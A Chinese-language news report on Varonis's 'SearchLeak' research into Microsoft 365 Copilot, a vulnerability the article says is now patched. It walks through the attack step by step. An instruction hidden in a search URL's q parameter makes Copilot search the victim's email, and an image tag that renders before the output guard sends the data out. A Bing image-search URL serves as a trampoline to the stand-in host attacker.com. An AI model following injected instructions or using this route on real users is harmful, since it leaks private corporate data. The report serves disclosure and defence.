为了引发参数到提示的注入攻击，攻击者向目标发送一封电子邮件，其中包含URL，其语法为https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=。该字段包含一条指令。Copilot很快就遵从了。研究人员在周一写道：“搜索功能正是攻击者所需要的，因为即使能力有限，拥有重要信息的用户就足够了。为了泄露数据，攻击者构造一个URL，告诉Copilot‘搜索用户的电子邮件’，提取标题，并将其嵌入图像URL中。”受害者什么也不输入。他们点击一个链接，Copilot就会完成剩下的工作。通常，包裹输出的保护措施会在<code>块中生效。但是，研究人员发现，保护措施仅在“思考”阶段之后才会启动。在那之前，Copilot使用原始HTML生成了响应，这会暂时在浏览器DOM中呈现。研究人员写道：因此，序列看起来是这样的：Copilot开始流式传输其响应，其中包含<img>标签。浏览器看到<img>，然后渲染它，并向Copilot生成的src URL发出HTTP请求。保护措施将一切包裹在<code>中。太晚了！请求已经离开。研究人员现在发现，从目标浏览器发出了一次图像请求。之前提到的问题是，Copilot不会向大多数网站发送图像请求。为了扩大这一防护措施，利用Microsoft的Bing搜索引擎作为某种蹦床。根据Copilot的内容安全政策，Bing是被允许发送此类请求的网站之一。Bing随后将请求发送到请求中包含的攻击者控制域。请求看起来像这样：https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png Varonis将该攻击称为SearchLeak。“由于SearchLeak针对Microsoft的企业级，影响范围不仅限于个人数据——它能够展示用户在组织内部访问的任何内容，包括电子邮件、会议邀请和笔记，”公司研究人员写道。“SharePoint文档、OneDrive文件以及其他索引的商业内容。根据M365如何与环境连接，影响范围甚至可以进一步扩大。”如前所述，Microsoft在周二修复了SearchLeak所利用的漏洞。然而，由于没有已知的方法来修复此类问题的根本原因，攻击者将不可避免地找到新的方法来规避新构造的保护措施，整个过程将再次重复。